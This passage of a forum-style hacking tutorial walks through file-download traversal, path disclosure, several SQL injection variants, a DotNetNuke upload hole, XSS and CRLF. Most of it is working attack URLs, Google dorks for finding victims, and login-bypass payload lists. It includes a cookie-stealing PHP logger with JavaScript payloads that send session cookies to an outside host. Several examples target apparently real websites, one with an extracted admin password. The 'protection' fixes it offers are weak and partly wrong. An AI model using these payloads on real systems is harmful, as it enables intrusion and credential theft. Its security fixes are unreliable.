1) LFD?
LFD (Local File Download) is vulnerability in script which is used to download files using GET method, but you can also use it with POST methid using add-on Tamer Data.
Code:
http://site.com/download_file.php?file=notepad.exe2) Vulnerable script
Code:
<?php
if(isset($_POST['download'])) {
$file = $_GET['file'];
$file_info = pathinfo($file);
header('Content-type: application/x-'.$file_info['extension']);
header('Content-Disposition: attachment; filename='.$file_info['basename']);
header('Content-Length: '.filesize($file));
readfile($file);
exit;
}
?>3) Vulnerability check
To check if script is vulnerable we are gonna try to download etc/passwd.
So instead of:
Code:
http://site.com/download_file.php?file=notepad.exeWe are gonna use:
Code:
http://site.com/download_file.php?file=../../../../../../../../../etc/passwdIf it starts to download and if it open file in text editor it look something like this:
Code:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologinScript is vulnerable!
NOTE: If it is a windows server use boot.ini instead of etc/passwd.
4) Exploiting vulnerability
Now when we know that script is vulnerable, we want to see which files are on host. You can do this on this way:
Code:
http://site.com/download_file.php?filel=../../ is gonna back us one directory backward and download file.
1.1 It is possible when it download file and open in text editor to print file list in directories.
1.2 or it is either possible to download file but when it is opened in text editor file is empty.
In case 1.1 we dont have to guess file name and directory and we can download whatever we want.
In case 1.2 we must guess file name and directory and we can download only files which name we guess. There is a few program that can help us to find files (Acunetix and HTTrack Website Copier).
5) Protection script
We have script mentioned at start:
Code:
<?php
if(isset($_POST['download'])) {
$file = $_GET['file'];
$file_info = pathinfo($file);
header('Content-type: application/x-'.$file_info['extension']);
header('Content-Disposition: attachment; filename='.$file_info['basename']);
header('Content-Length: '.filesize($file));
readfile($file);
exit;
}
?>by adding if(file_exists("download/".$file) we are gonna secure script.
So it should look like:
Code:
<?php
if(isset($_POST['download'])) {
$file = $_GET['file'];
$file_info = pathinfo($file);
if(file_exists("download/".$file)) {
header('Content-type: application/x-'.$file_info['extension']);
header('Content-Disposition: attachment; filename='.$file_info['basename']);
header('Content-Length: '.filesize($file));
readfile($file);
exit;
}
}
?>[IV] Full path disclosure
This method let you over errors in file or over errors made by programmers to let you see which files are in which directories, over it you can't directly hack site, it just let you help while hacking.
It is useful because it can help you in faster and easier hacking, also it can help you with Local File Inclusion (LFI), when folder name is changed, or some other file. You can findout using FPD.
There is a lot of ways using FPD vulnerability on site, I'll explane you 2 most important.
1st is over array, by adding square brackets on link like this one:
Code:
index.php?page=homeTo finish vulnerability attack is to add [] on destined place:
Code:
index.php?page[]=home.That will give you error like this:
Code:
Warning: include(blah/errors.php) [function.include]: failed to open stream: No such file or directory /home/insekure/public_html/index.php on line 211From this you can see on site is it exists directory blah.
2nd method is to add most used cookie (Null Session Cookie), and you can add him by Java-injection, by adding java code on site you will get error.
This is javascript code:
Code:
avascript:void(document.cookie='PHPSESSID=');add in your adress bar and hit enter, now when page is refreshed you will get error:
Code:
Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /home/example/public_html/thems/errors.php on line 58then try to open directory thems on site, that should list you files in that directory.
Protection:
Most simple way to protect from this attacks is to turn-off error reporting.
edit or add:
Code:
error_reporting(0);[V] MYSQL Injection
1) Dorks
Code:
inurl:admin.asp
inurl:login/admin.asp
inurl:admin/login.asp
inurl:adminlogin.asp
inurl:adminhome.asp
inurl:admin_login.asp
inurl:administrator_login.aspI am gonna use:
Code:
http://site.com/Admin_Login.asp2) Loging
Now you can find some site over these dorks and try to log in with:
Username: Admin
Password: password' or 1=1--
Instaed of password' or 1=1 you can use some of these:
Code:
'or'1'='1
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
'or'1=1'password' or 1=1 is gonna confuse server and will let you log in.
So if you are able to log in, site is vulnerable and you are gonna be able to use admin panel.
[VI] SQL Injection
1) SQL Injection?
SQL Injection is type of web attack. Attacker use hole in script to take all data from database. Vulnerable sites are in format:
Code:
http://www.link.com/index.php?id=You can put anything else instaed of index.
2) Finding vulnerable sites:
Best way to find vulnerable site is bay using google. We use this dorks to find sites:
Code:
inurl:faq.php?id=
inurl:event.php?id=
inurl:index.php?id=3) Site vulnerability check:
There are 2 ways to check if site is vulnerable.
1st way, we got link:
Code:
http://site.com/book.php?id=141we are gonna add only ' at end of link so we get this link:
Code:
http://site.com/book.php?id=141'2nd way, we got link:
Code:
http://site.com/book.php?id=141we are gonna add +and+1=2-- at end of link so we get:
Code:
http://site.com/book.php?id=141+and+1=2--If some part of page dissapear (picture, text or something) or any error like (You have an error in your sql syntax) site is vulnerable.
4) Finding number of columns
We can do it by using function order by, on link:
Code:
http://site.com/book.php?id=141adding +order+by+5--
Code:
http://site.com/book.php?id=141+order+by+5--If page is opens normal there is more then 5 columns. Lets try with 10.
Code:
http://site.com/book.php?id=141+order+by+10--Now some part of site dissapeared, which means that theres more then 5 and less then 10 columns. Lets try 7.
Code:
http://site.com/book.php?id=141+order+by+7--Page is opened normally which means that there is more then 7 and less then 10 columns. Lets try 8.
Code:
http://site.com/book.php?id=141+order+by+7--on column 8 part of site dissapear which means that there is 7 columns.
5) Finding vulnerable columns
Finding vulnerable columns is done with function uion select all on link (in this case) we are gonna add +union+select+all+1,2,3,4,5,6,7--
Code:
http://site.com/book.php?id=-141+union+select+all+1,2,3,4,5,6,7--It is gonna write numbers on page (in this case 1 2 3 4 5 6 7) which means that data can be taken from any column. We are gonna take from second column.
6) Finding database version
As I said we are gonna take data from second column. Instead of number 2 we are gonna put version() or @@version
Code:
http://site.com/book.php?id=-141+union+select+all+1,@@version,3,4,5,6,7--on page where number 2 was, it will show database version.
If database version is 4 we have to guess name of table and column, but if database version is 5 we have to guess database version.
We have version 5.0.51a-24+lenny5 which means that we dont have to guess name of table and column.
7) Finding table name
If database version is 4 you wont be able to find name of table and column, you have to guess their names. If database version is skip this step.
Names of some possible tables:
Code:
admin
admins
user
users
member
membersNames of some possible columns:
Code:
username
uname
un
user
name
nick
password
pw
pwd
passwdIf database version is 5 we can take name of table by doing next step: instead of number 2 we gonna put group_concat(table_name) and after number of last column +from+information_schema.tables+where+table_schema=database()--
So we get this link:
Code:
http://site.com/book.php?id=-141+union+select+all+1,group_concat(table_name),3,4,5,6,7+from+information_schem?a.tables+where+table_schema=database()--Instead of number 2 it showed name of table, in this case date, book, users. We gonna take columns from users table.
8) Finding column name
We found table name that we want and now from that we want to take columns. Instead of group_concat(table_name) we gonna putgroup_concat(column_name) and instead of +from+information_schema.tables+where+table_schema=database()-- we gonna put+from+information_schema.columns+where+table_name=hex-- instead of hex we have to encrypt in hex name of table.
Go to:
Code:
http://www.string-functions.com/string-hex.aspxwrite name of table (in this case users) and we get hex-ed number: 7573657273 so now can see columns:
Code:
http://site.com/book.php?id=-141+union+select+all+1,group_concat(column_name),3,4,5,6,7+from+information_sche?ma.columns+where+table_name=0x7573657273--9) Taking data from columns
We got: id, name, surname, username, password, level.
We need only username and password.
Instead of group_concat(column_name) we put group_concat(username,0x3a,password) 0x3a stands for to make space between user and pw. Instead offrom+information_schema.columns+where+table_name=0x7573657273-- we put +from+users--
and we have link:
Code:
http://site.com/book.php?id=-141+union+select+all+1,group_concat(username,0x3a,password),3,4,5,6,7+from+users?--and result e.g.:
Code:
sebrezovski:1533562
seratum:seratum
coach:53.21.1985.
biga:bigawhich is users and passwords from this site.
10) Filter bypassing
In case when you write union+select+all says "not accessible" then change it to UnIoN+sElEcT+aLl
On some sites space is restricted so you can put + or /**/ (/* start of comment in php and finish */)
On some sites there is also restricted database version so you can use unhex(hex(version()))
11) Site protection from SQL Injection
Just put this code in your script:
Code:
if(!is_numeric($_GET['id']))
{
echo 'It is gonna write text when some try to add /' or and+1=2';
}SQL Injection - Load File
You found site with SQL vulnerability, now you can try to access table mysql.user and file privileges.
To so which is user and do we have user privileges we are adding 'user' instead of vuln column and at end of url adding '+from+mysql.user--'.
It should look like this:
Code:
http://www.site.com/index.php?id=1+union+select+all+1,2,user,4+from+mysql.user--If you get username, it means that you have access to mysql.user table and you can continue with this tut.
Now to see if we have file privileges we have to instead of 'user' add 'concat(user,0x3a,file_priv)' and ofcourse '+from+mysql.user--'
Now when on page usernames and file priv. are listed you must find username which was written at start, when you was writing 'user' in column, when you find it and if besides him shows 'Y' which is Yes. You have privileges.
Load File:
All we have to do is to write on vuln column load_file('FILE NAME').
We gonna try with /etc/passwd, so we type in vuln column 'load_file('/etc/passwd').
Which look like this:
Code:
http://www.site.com/index.php?id=1+union+select+all+1,2,load_file('/etc/passwd'),4--If it give us error we can convert file in Char or Hex, but if we do it we must delete " ' " in file name.
Hex e.g.
If we convert file name in Hex, before file name we adding '0x'
Code:
http://www.site.com/index.php?id=1+union+select+all+1,2,load_file(0x2f6574632f706173737764),4+from+m?ysql.user--Hex code '2f6574632f706173737764' works for '/etc/passwd'.
It is recommender for Hex:
Code:
www.string-functions.com/string-hex.aspxIf you decide to convert file in Char then add 'load_file(char(converted file to char))'
Which looks like:
Code:
http://www.site.com/index.php?id=1+union+select+all+1,2,load_file(char(47,101,116,99,47,112,97,115,1?15,119,100),4--Where ' 47,101,116,99,47,112,97,115,115,119,100 ' works for '/etc/passwd'
Char converter:
Code:
http://pookey.co.uk/binary.php[VII] MSSQL Injection
1) Finding number of columns
I will use:
Code:
http://www.site.com/sr/page/member.asp?id=234To find column number we gonna use order by function. We gonna add +order+by+5-- at end of link.
Code:
http://www.site.com/sr/page/member.asp?id=234+order+by+5--So we gonna get next error:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 5 is out of range of the number of items in the select list.
/sr/page/member.asp, line 38which means that there is less then 5 columns, lets try with 4. We gonna get same error, so we gonna try with 3 and we get next error:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'order'.
/sr/page/member.asp, line 44Which means that there is 3 columns.
2) Finding database version
To find database version we are using @@version.
Code:
http://www.site.com/sr/page/member.asp?id=-234+union+select+all+1,@@version,3--and we get:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on Windows NT 5.2 (Build 3790: Service Pack 2) ' to a column of data type int.
/sr/page/member.asp, line 38and from here we can see database version.
3) Finding table name
With MSSQL Injection it is not possible to get all tables at once, we must go 1 by 1.
Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,table_name,3+from+information_schema.tables?--and we get:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Country' to a column of data type int.
/sr/page/member.asp, line 38and we can see that we have table 'Country'.
Now we have to find other tables. We are gonna use not+in function. So we have link:
Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,table_name,3+from+information_schema.tables?+where+table_name+not+in('Country')--and we get:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Admin' to a column of data type int.
/sr/page/member.asp, line 38and from here we can see that we have Admin table.
4) Finding column name
It is same for columns. We can not get all columns at once, so we have to do it 1 by 1. In this case we are gonna use where+table_name='Admin'--. So we have link:
Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,column_name,3+from+information_schema.colum?ns+where+table_name='Admin'--and we have error:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'USERNAME' to a column of data type int.
/sr/page/member.asp, line 38From here we can see that we have column USERNAME. Now we need rest columns so we gonna use again not+in function.
Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,column_name,3+from+information_schema.colum?ns+where+table_name='Admin'+and+column_name+not+in('USERNAME')--and we get:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'PASSWD' to a column of data type int.
/sr/page/member.asp, line 38So columns is PASSWD.
5) Taking data from columns
Now we have to put name of table instead of table_name and everything after from we are puting name of table.
Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,USERNAME,3+from+Admin--We get username OjuZwqAul.
It is same for password:
Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,PASSWD,3+from+Admin--We get password M7sWt2!2uq.
[VIII] Blind SQL Injection
1) Blind SQL Injection?
Difference between SQL Injection and Blind SQL Injection is that Blind SQL Injection is not writing any errors, any table and column names or column content. So that is why it is called Blind SQL. You are just messing with part of site dissapearing - image, text, etc... In Blind Injection we dont use --i/* */.
2) Site vulnerability check
We have link:
Code:
http://www.site.com/index.php?id=1We gonna add and 1=2
Code:
http://www.site.com/index.php?id=1+and+1=2If any part of page dissapear, it means that site is vulnerable.
3) Finding database version
As we said already in this method nothing is gonna be showed, so we gonna say that database version is 4. If part of site dissapear it means that version is not 4, but if everything on page stay as it should it means that version is 4. We gonna use function @@version.
Code:
http://www.site.com/index.php?id=1+and+substring(@@version,1,1)=4If page is loaded as it should then version is 4, if not, then we gonna try:
Code:
http://www.site.com/index.php?id=1+and+substring(@@version,1,1)=54) MYSQL user
First we gonna check are we able to use select because it is blocked sometimes.
Code:
http://www.site.com/index.php?id=1+and+(select+1)=1If page is loaded normally we can use select, but if not then we can't use it. Now we gonna check do we have MYSQL user access.
Code:
http://www.site.com/index.php?id=1+and+(SELECT+*+from+mysq.user+limit+0,1)=1Same as everything else, if page is loaded normally we have access to mysql.user, if not then we dont have. mysql.user is useful to get hash password or useload_file() and OUTFILE.
5) Finding table name
To find table names all we have to do is guess. First we gonna find table name then after column name from table.
We have link and we are gonna try to get names of different tables. If page is loaded normally it means that table name is there and exists.
Code:
http://www.site.com/index.php?id=1+and+(select+1+from+ime_tabele+limit+0,1)=1Our main objective is to to find data from admin table, we can also use:
Code:
admin
administrator
member
login
members
adm
user
users
tbl_admin6) Finding column name
Now when we found name of table we wanted it is time to find column name. We doing same as for table. There is name matching, if page is loaded normally then column exists. We need loging data so commonly columns gonna be:
Code:
username
admin
admin_username
uname
user
nick
password
pwrod
admin_password
pw
passLink that we use for columns is:
Code:
http://www.sajt.com/index.php?id=1+and+(select+substring(concat(1,ime_kolone),1,1)from+ime_tabele+li?mit+0,1)=17) Taking data from columns
In whole Blind SQL this gonna be most bored and longest part. Here we gonna need ascii table.
Code:
http://www.asciitable.com/We gonna look only for DEC and CHR ascii tables. First we gonna get username, geting letter by letter. So we need to guess DEC for some letter, e.g. for A it is 65.
We have link:
Code:
http://www.site.com/index.php?id=1+and+ascii(substring((select+concat(column_name)+from+column_name+?limit+0,1)1,1))>from DEC numberIf page load normally we found are real letter for username. To find our second letter change +limit+0,1 to +limit+1,1.
So now we are guessing second letter... It is same for password... So after long long time we get username and password. If there is more users and if you want to get their passwords too you will have to add where function.
So it should look like:
Code:
http://www.site.com/index.php?id=1+and+ascii(substring((select+concat(column_name)+from+column_name+?where+column_name=something+limit+0,1)1,1))>from DEC letterTo use where for second column_name we usually using id, but we can also use other stuff. e.g. for id:
Code:
http://www.site.com/index.php?id=1+and+ascii(substring((select+concat(column_name)+from+column_name+?where+id=1+limit+0,1)1,1))>from DEC letter8) Taking data from columns using sqpmap
As you noticed already that you need a lot of time to get data from columns I would suggest you to use sqlmap.
Windows download:
Code:
http://downloads.sourceforge.net/sqlmap/sqlmap-0.9.zipCode:
http://downloads.sourceforge.net/sqlmap ... 0.9.tar.gzNOTE: almost all unix systems have installed sqlmap already, and you will also need python if you do not have it already.
Python download:
Code:
http://www.python.org/download/Now we have to find directory where sqlmap is located.
Start>run>cmd and find sqlmap directory using cd function.
Function to start sqlmap for geting data with Blind SQL Injection for windows is:
Code:
sqlmap.py -u "http://site.com/index.php?id=1" -p id -a "./txt/user-agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT concat(name_username_columns,0x3a,name_password_columns) from table_name)"NOTE: for unix put python before sqlmal.py
So it should look like:
Code:
python sqlmap.py -u "http://site.com/index.php?id=1" -p id -a "./txt/user-agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT concat(name_username_columns,0x3a,name_password_columns) from table_name)"If there is more users as I said then use id:
Code:
sqlmap.py -u "http://site.com/index.php?id=1" -p id -a "./txt/user-agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT concat(name_username_columns,0x3a,name_password_columns) from table_name where id=1)"After -u you put link.
After -p you put parameter which is vulnerable (in our case id).
-a we are using for some random user agen-t from txt/user-agents.txt
-v1 is verbose
After --string stavljamo something that sqlmap is gonna recognize that he found letter (some part of text who dissapear if case is false).
-e is command that we want to execute. In our case this one:
Code:
SELECT concat(name_username_columns,0x3a,name_password_columns) from table_name where userid=1[IX] Postgre SQL Injection
1) Postgre SQL Injection?
Postgre SQL Injection is almost same as SQL Injection. Difference is in Postgre base, not MySQL. It is a bit complicated attack then usually SQL Injection. There is some other functions that we are gonna use, you will see.
1) Finding vulnerable sites
Finding site vulnerability is same as usual SQL Injection, which means that we can use google dorks.
Here is some:
Code:
inurl:faq.php?id=
inurl:event.php?id=
inurl:index.php?id=3) Site vulnerability check
You found site that may be vulnerable. To check if site is vulnerable we gonna add ' at end of link.
Code:
http://www.link.com/page.php?page=1'So if on page we get:
Code:
Warning: pg_query() [function.pg-query]: Query failed: ERROR: syntax error at or nearor some part of page dissapear then site is vulnerable.
4) Finding number of columns
So we know that site is vulnerable, now we need to find column number. We gonna do it with union function this time.
Our link:
Code:
http://www.link.com/page.php?page=1+union+select+all+null--+-If page is loaded normally that means that there is more columns.
Code:
http://www.link.com/page.php?page=1+union+select+all+null,null,null,null from dual--We are adding null all the time till we get error. If we get error with 7 null, it means that we have 6 columns, which means 6 nulls.
5) Finding vulnerable columns
It is just so easy to find column vulnerability. Null = 0, which means that everything you put instead of certain null, if nothing happens it means that columns is not usable. That is how we gonna find vulnerable column.
So:
Code:
http://www.link.com/page.php?page=1+union+select+all+current_database(),null,null,null--+-If there is nothing listed, it means that column is not usable we will move on next, and this one back to null.
6) Finding database version
We are doing this with version() function.
Link which gonna show us version:
Code:
http://www.link.com/page.php?page=1+union+select+all+version(),null,null,null--+-we gonna get something like:
Code:
PostgreSQL 9.0.4 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit7) Finding table name
Same as usual SQL Injection, only diff. is that instead of column number we have null.
So it should look like:
Code:
http://www.link.com/page.php?page=1+union+select+all table_name,null,null,null+from+information_schema.tables--+-We gonna get table names, and we gonna get columns from table.
8) Finding column name
It is also easy, and there is no big diff.
This is how it should look like:
Code:
http://www.link.com/page.php?page=1+union+select+all column_name,null,null,null+from+information_schema.columns+where+table_name=user?s--+-Sometimes this wont work so we need to convert = from ascii in decimal.
You can use this site:
Code:
http://easycalculation.com/ascii-hex.phpSo we have link:
Code:
http://www.link.com/page.php?page=1+union+select+all+column_name,null,null,null+from+information_sch?ema.columns+where+table_name||CHR(61)||users--+-9) Taking data from columns
Also almost same as usual SQL Injection:
Code:
http://www.link.com/page.php?page=1+union+select+all+username||CHR(58)||password+from+users--+-[X]Error based Postgre SQL Injection
1) Error based Postgre SQL Injection?
Error based Postgre SQL Injection is type of web attack releated to Postgre SQL base. Difference is that you can get all tables, columns and values from columns etc. As title says attack is based on errors, and all results will be shown in errors.
2) Finding vulnerable sites
Use google dorks:
Code:
inurl:faq.php?id=
inurl:event.php?id=
inurl:index.php?id=3) Site vulnerability check
Add ' at end of link:
Code:
http://www.link.com/page.php?page=1'so if we get:
Code:
Warning: pg_query() [function.pg-query]: Query failed: ERROR: syntax error at or nearsite is vulnerable.
4) Finding database version
Use version() function. In this type of attack query looks a bit complicated then usual SQL Injection so don't get confused.
Code:
http://www.link.com/page.php?page=1+and+1=cast(version()+as+int)--If function is loaded successfully you will get this on page:
Code:
Warning: pg_query() [function.pg-query]: Query failed: ERROR: invalid input syntax for integer: "PostgreSQL 9.0.4 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit"from where we get database version:
Code:
PostgreSQL 9.0.4 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit5) Finding table name
As I said at start we are not able to get all tables in same time so we gonna use limit and offset functions.
We gonna use offset to say which result from base we want to list.
Our link:
Code:
http://www.link.com/page.php?page=1+and+1=cast((select+table_name+from+information_schema.tables+lim?it+1+offset+0)+as+int)--on page we will get this error:
Code:
Warning: pg_query() [function.pg-query]: Query failed: ERROR: invalid input syntax for integer: "pg_type"from this we have table pg_type.
to get next table we gonna change offset to 1:
Code:
http://www.link.com/page.php?page=1+and+1=cast((select+table_name+from+information_schema.tables+lim?it+1+offset+1)+as+int)--and we gonna get table like pg_attribute.
6) Finding column name
First you have to do is to convert table name into decimal.
We gonna use:
Code:
http://easycalculation.com/ascii-hex.phptype string admin and you will get decimal code:
Code:
97 100 109 105 110We gonna change this code a bit, so it should look like this:
Code:
CHR(97)+||+CHR(100)+||+CHR(109)+||+CHR(105)+||+CHR(110)Now we gonna put it for table names and get columns.
Code:
http://www.link.com/page.php?page=1+and+1=cast((select+column_name+from+information_schema.columns+w?here+table_name=CHR(97)+||+CHR(100)+||+CHR(109)+||+CHR(105)+||+CHR(110)+limit+1+?offset+0)+as+int)--and we gonna get column id. We gonna change offset all the time till site back us on home page, which means that there is no more columns in that table.
7) Taking data from columns
We found column username and password and now we want to get data from column.
Code:
http://www.link.com/page.php?page=1+and+1=cast((select+username+||CHR(58)||+password+from+admin+limi?t+1+offset+0)+as+int)--and we gonna get this:
Code:
admin:21232f297a57a5a743894a0e4a801fc3CHR(58) presents two points (:) and we use to get two columns at same time.
NOTE: (Regard to whole tutorial) from now I'm not gonna explane it detailed, 'cause I think you should figure it out till now already. So I'm gonna use pics and codes only.
[XI] SQL Injection on ASPX
1) Site vulnerability check
Vulnerable link:
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535&Prod=SilkCottonWe gonna add order by 1--:
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535&Prod=SilkCotton order by 1--If you get page error go to:
Code:
http://pothys.com/ImageDisplay.aspx?Id=15352) Finding column name
Go to:
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 having 1=1Image has been scaled down 8% (870x541). Click this bar to view original image (944x587). Click image to open in new window.
3) Finding table name
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 table_name from information_schema.tables))Image has been scaled down 8% (870x209). Click this bar to view original image (942x226). Click image to open in new window.
We want admin table, so we type next:
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Tab_FinalOrder')))Image has been scaled down 8% (870x210). Click this bar to view original image (937x226). Click image to open in new window.
admin table name is AdminMaster
4) Finding columns in admin table
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name = 'AdminMaster'))Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name = 'AdminMaster' and column_name not in ('Admin_name')))Columns names:
Image has been scaled down 8% (870x210). Click this bar to view original image (939x226). Click image to open in new window.
Image has been scaled down 8% (870x210). Click this bar to view original image (937x226). Click image to open in new window.
5) Finding username and password
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 Admin_name from AdminMaster))Image has been scaled down 8% (870x210). Click this bar to view original image (937x226). Click image to open in new window.
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 Admin_password from AdminMaster))Image has been scaled down 8% (870x210). Click this bar to view original image (938x226). Click image to open in new window.
Code:
Username: admin
Password: pothys!@#[XII] Dot net nuke
DNN is gallery where you can upload on site and in there you can hold pictures and have like "online gallery". That gallery have hole in itself so you can use it to upload files on site with extension: *.gif, *.jpg, *.pdf, *.txt, *.swf..
Google dork to find vulnerable sites:
Code:
inurl:fck/fcklinkgallery.aspxI'm gonna use this site:
Code:
http://kellyballancephotography.com/providers/htmleditorproviders/fck/fcklinkgallery.aspxNow if page is loaded it will look like this:
Image has been scaled down 16% (870x544). Click this bar to view original image (1024x640). Click image to open in new window.
which means that we can continue. Now we choose option 3 -> File (A File On Your Site) and we type javascript to upload file.
Code:
javascript:__doPostBack('ctlURL$cmdUpload','')Choose File and Text button Upload Selected File will show up.
*on this site letter colour matched with background so you will have to select whole page (CTRL+A) and you will see upload button.
Image has been scaled down 16% (870x544). Click this bar to view original image (1024x640). Click image to open in new window.
Upload file and access it by going to sitelink.com/portals/0/filename.extension
->
Code:
http://kellyballancephotography.com/portals/0/config.txt[XIII] XSS
1) XSS?
XSS lets attacker to execute Javascript code. XSS is shortcut of Cross Site Scripting.
You can use XSS for many ways. For simple Javascript executing commands, or you can use it to steal cookies. We are Injecting Cookies so we can login somewhere w/o password.
2) Required stuff
Mozila FireFox:
Code:
http://www.mozilla.org/en-US/products/download.html?product=firefox-3.0.5&os=win&lang=en-GBAdd-on Firebug:
Code:
https://addons.mozilla.org/en-US/firefox/addon/firebug/Add-on FireCookie:
Code:
https://addons.mozilla.org/en-US/firefox/addon/firecookie/Add-on Live HTTP Headers:
Code:
https://addons.mozilla.org/en-US/firefox/downloads/file/28118/live_http_headers-0.14-fx+sm.xpiIt is recommended to have primary knowledge of Javascripts.
3) Testing XSS vulnerability
Sites on which we can use this method are sites where is text input and submit button and on sites where you can use GET method to print something.
e.g. of GET method:
Code:
www.sitecom/index.php?page=<script>alert("XSS")</script>Command to check site vulnerability is:
Code:
<script>alert("XSS")</script>Now I will explane what this command is doing:
<script> - opening script tag
alert("XSS") - window will pop-up saying "XSS"
</script> - close script tag
4) XSS types
Cookie stealing - we are stealing cookies from some user (commonly admin), and input cookie in our browser so when we login to site we are gonna be logged in alrdy.
Cross-Site Request Forgery - we are sending some commands without knowing username.
XSS Worms - it is "evil" script that have possibility to spread over whole site.
Door-Forwarding - script makes iframe which will exploit something or start download some virus, rat, keylogger, istealer, etc...
Keylogging - you know what keylogging is.
5) Cookie stealing
For cookie stealing we will need:
-Vulnerable site
-Web-host for scripts
-php script
attach this script on some hosting:
cookie.php
Code:
<?php
$cookie = $HTTP_GET_VARS["cookie"];
$file = fopen('cookielog.txt', 'a');
fwrite($file, $cookie."\n");
?>script executing:
Code:
<script>document.location="http://www.link.com/cookie.php?cookie=" + document.cookie;</script>
ili
<script>location.href="http://www.link.com/cookie.php?cookie=" + document.cookie;</script>
ili
<script>window.open('http://www.link.com/cookie.php?cookie=' + document.cookie;)</script>
ili
<script>window.location='http://www.link.com/cookie.php?cookie=' + document.cookie;</script>How this works?
When some user log on page with your cookie logger and you save his cookie. Then we take cookie and use it. So here is how we do it:
1) Open Mozilla
2) Open Add-on Fire bug
Image has been scaled down 15% (870x512). Click this bar to view original image (1023x602). Click image to open in new window.
3) Type cookie name and value. Here is one:
Code:
PHPSESSID=db3e4e100ab6bb912de1b80c4eed7898from this cookie value is b3e4e100ab6bb912de1b80c4eed7898
6) Filter bypassing
1) Deleting script tag
e.g. if we type <script>alert("XSS")</script> and he put only command alert("XSS"). This script delete tags <script> and </script>
Here is also how to bypass protection: Instead of <script>alert("XSS")</script> we gonna put <scr<script>ipt>alert("XSS")</scr</script>ipt>
2) magic_quotes
Explained here:
Code:
http://en.wikipedia.org/wiki/Magic_quotesIf you type <script>alert("XSS")</script> and it prints <script>alert(\"XSS\")</script> then it is magic_quotes protection.
It is a bit harder to bypass magic_quotes protection. It works over String.fromCharCode.
Here is example:
This is link of our cookie logger: http://link.com/cookie.php we would use <script>location.href="http://www.link.com/cookie.php?cookie=" + document.cookie;</script> into:
Code:
<scr<script>ipt>location.href=String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,108?,105,110,107,46,99,111,109,47,99,111,111,107,105,101,46,112,104,112,63,99,111,11?1,107,105,101,61,)+document.cookie;</scr</script>ipt>This works when you add \ code ' or " and when you use integer you do not use ' or "
and here: http://www.link.com/cookie.php?cookie= we also converted decimal code with this tool:
Code:
Ascii to Decimal
http://pookey.co.uk/binary.php[XIV] CRLF
1) CRLF?
Shortcut from Carriage Return and Line Feed. CRLF is very easy to use. It is actually like we are adding new row (\n).
2) Vulnerable places
Vulnerable places are anywhere. In this tut. I'm gonna use some chat.
3) Exploiting vulnerability and protection
Lets say if you send message chat will look like this:
Code:
1.4.2012 10:29 - fodex: Why login page is down?
1.4.2012 10:29 - saiR: Look like somebody deleted login database.
1.4.2012 10:29 - Admin: I'm gonna check this out and will announce you.
1.4.2012 10:30 - saiR: Ok go ahead...\n1.4.2012 10:30 - Admin: You are right saiR login database is deleted. Log in here till I get it back: http://vulnerablesite.com/login.phpIf chat is vulnerable, it's gonna look like this:
Code:
1.4.2012 10:30 - saiR: Ok go ahead...
1.4.2012 10:30 - Admin: You are right saiR login database is deleted. Log in here till I get it back: http://vulnerablesite.com/login.phpWe wrote second msg from Admin and users will think that Admin sent it actually and will log in to site we gave them. With login we are gonna keylog site logins.
4) Vulnerable script
e.g.
Code:
<?php
if(isset($_POST['send_message']))
{
if(!empty($_POST['message']))
{
$message = htmlspecialchars($_POST['message']);
// rest code to send msg
}
}
?>[XV] CSRF
1) CSRF?
